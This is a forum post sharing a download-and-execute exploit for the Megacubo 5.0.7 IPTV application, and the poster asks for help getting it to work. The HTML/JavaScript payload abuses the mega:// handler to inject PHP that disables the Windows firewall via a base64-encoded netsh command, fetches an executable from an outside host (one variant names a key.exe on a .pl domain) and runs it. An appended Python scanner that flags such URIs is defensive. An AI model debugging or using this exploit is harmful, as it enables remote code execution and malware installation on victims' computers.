Megacubo 5.0.7 - help

gelman8

User
Joined
February 2, 2009
Posts
2
I have an exploit:

Code:
Megacubo 5.0.7 download & Execute
by :JJunior
site: http://www.musicastop.com.br/

tested against Internet Explorer 7 and Mozilla Firefox 1.5 Windows Xp sp 3

software site: http://www.megacubo.net/tv/
download url: http://sourceforge.net/project/showfiles.p...lease_id=608023

description:
"Megacubo is a IPTV tuner application written in PHP + Winbinder.
It has a catalogue of links of TV streams which are available
for free in the web. At the moment it only runs on Windows(2000,
XP and Vista)."

example exploit, download & Execute :


<html>
<head>
<title>MegaCubo - download & Execute</title>
<meta http-equiv="Content-Type" content="text/html; ">
</head>
<body>
<script>
// url download & exec code evil
evil = 'http://www.example.com/evil.exe';

// disable firewall encode base_64
firewall = 'bmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlID0gZGlzYWJsZQ==';

shellcode = 'mega://play|con.."a()".system(base64_decode("'+firewall+'")).fputs(fopen("c:/Megacubo.exe","w"),file_get_contents("'+evil+'")).system("C:/Megacubo.exe")."/?");print(';

// shell code
window.location=shellcode;

</script>
</body>
</html>

After uploading it to a server it does not work under IE or Mozilla (firewalls off). In Mozilla a window pops up saying that something does not work with the mega protocol, and in IE that the page cannot be displayed, and in the bar where you type the URL this shows up:
Code:
mega://play|con.."a()".system(base64_decode("bmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlID0gZGlzYWJsZQ==")).fputs(fopen("c:/Megacubo.exe","w"),file_get_contents("www.stronazkeyem.pl/key.exe")).system("C:/Megacubo.exe")."/?");print(
What should I do about this?
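
For defenders, an added example that is not part of the original post: a small Python scanner that flags `mega://` links carrying PHP call syntax, as in the URI quoted above, and decodes any base64 argument for triage. The function name `scan` and the sample lines are constructed for illustration; the base64 blob is the one shown in the post.

```python
import base64
import re
from urllib.parse import unquote

# PHP calls that appear in the URI quoted in the post; extend as needed.
SUSPICIOUS_CALLS = ("system", "base64_decode", "fopen", "fputs", "file_get_contents")
MEGA_URI = re.compile(r"mega://[^\s<>]+", re.IGNORECASE)
CALL = re.compile(r"\b(" + "|".join(SUSPICIOUS_CALLS) + r")\s*\(", re.IGNORECASE)
B64_ARG = re.compile(r"base64_decode\(\s*[\"']([A-Za-z0-9+/=]+)[\"']", re.IGNORECASE)

# Constructed sample input: one plain channel link, one link shaped like the post's URI.
SAMPLES = [
    "mega://play|news-channel",
    'mega://play|con.."a()".system(base64_decode('
    '"bmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlID0gZGlzYWJsZQ=="))."/?");print(',
]


def scan(text):
    """Return one finding per mega:// URI that contains PHP call syntax."""
    findings = []
    # Percent-decode first so encoded copies of the URI (e.g. in proxy logs) still match.
    for match in MEGA_URI.finditer(unquote(text)):
        uri = match.group(0)
        calls = sorted({name.lower() for name in CALL.findall(uri)})
        if not calls:
            continue  # ordinary link with no call syntax
        decoded = []
        for blob in B64_ARG.findall(uri):
            try:
                raw = base64.b64decode(blob, validate=True)
                decoded.append(raw.decode("utf-8", "replace"))
            except ValueError:  # binascii.Error is a ValueError subclass
                decoded.append("<undecodable>")
        findings.append({"uri": uri, "calls": calls, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for finding in scan("\n".join(SAMPLES)):
        print("suspicious mega:// link, calls:", ", ".join(finding["calls"]))
        for command in finding["decoded"]:
            print("  decoded base64 argument:", command)
```
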
 